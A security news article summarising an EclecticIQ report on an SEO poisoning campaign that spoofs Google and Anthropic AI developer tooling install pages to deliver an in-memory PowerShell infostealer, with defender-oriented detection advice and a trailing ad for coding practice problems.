What happened
Security researchers at EclecticIQ documented an ongoing SEO poisoning campaign that impersonates developer tooling pages for Google and Anthropic, delivering an information-stealing payload to Windows hosts, according to an EclecticIQ intelligence report published in May 2026 and coverage by Infosecurity Magazine. The initial public flag was posted by independent researcher @g0njxa on April 21, 2026, and EclecticIQ says attacker-controlled domains began appearing in early March 2026. Reporting by EclecticIQ and Infosecurity Magazine describes typosquatted domains and search-engine manipulation used to surface fake installer pages that mimic legitimate AI agent installation flows.
Technical details
EclecticIQ reports the malware executes entirely in memory via PowerShell, targeting Windows endpoints and exfiltrating collected data to an encrypted command-and-control server. The researchers describe broad collection capabilities that include browser-stored credentials and session data for both Chromium-family browsers and Firefox, and extraction of authentication artifacts from collaboration and communication clients. EclecticIQ lists targeted sources of secrets including:
- •Slack, Microsoft Teams, Discord, Zoom, Telegram Desktop and others, where session cookies, local state files and DPAPI-protected keys are collected;
- •OAuth tokens, CI/CD credentials and corporate VPN details, which EclecticIQ highlights as items of particular interest to financially motivated operators.
EclecticIQ also notes the stealer enables arbitrary remote code execution, providing operators a pathway to hands-on-keyboard intrusions after initial compromise.
Editorial analysis - technical context
Campaigns that impersonate developer tooling and package installers commonly exploit search-ranking manipulation because developer workflows often start with a web search. SEO-poisoning attackers benefit from low-cost domain registration and typosquatting to intercept installs, and in-memory PowerShell loaders are a persistent technique to evade disk-based detection. For practitioners, this pattern increases the importance of reproducible, offline-install workflows for critical developer tools and robust endpoint monitoring for in-memory execution chains.
Context and significance
EclecticIQ frames this campaign as part of a broader trend where financially motivated eCrime actors capitalize on enterprises' adoption of AI developer tooling to reach high-value developer workstations. Reporting cites domain choices including .co.uk, .us.com and .us.org as evidence the campaign may be geographically tailored toward users in the US and UK, per EclecticIQ. Public reporting links the discovery timeline to activity beginning in March 2026 and public disclosure in April and May 2026.
What to watch
Observers should monitor malicious domain takedowns and search-engine remediation, public disclosures from affected platform vendors, and law-enforcement actions targeting infostealer C2 infrastructure. Industry detection signals to follow include spikes in in-memory PowerShell execution correlated with web downloads from newly registered or typosquatted domains, and unexplained OAuth token usage or CI/CD credential attempts after developer workstation browsing activity.
Key Points
- 1Campaigns impersonating AI developer tooling use SEO poisoning to reach developer workstations, increasing supply-chain risk for software builds.
- 2In-memory PowerShell infostealers harvest browser cookies, OAuth tokens and CI/CD credentials, creating rapid paths from workstation compromise to enterprise access.
- 3Detection focus should shift to in-memory execution telemetry, suspicious domain registrations, and anomalous OAuth/CI activity following developer searches.
Scoring Rationale
The campaign targets developer tooling to harvest high-value secrets (OAuth tokens, CI/CD credentials), which materially raises enterprise supply-chain and initial-access risk for practitioners. The techniques-SEO poisoning and in-memory `PowerShell` loaders-are familiar but effective, making the story notable for security teams and devops engineers.
Practice interview problems based on real data
1,625 SQL & Python problems across 15 industry datasets — the exact type of data you work with.
Try 250 free problems

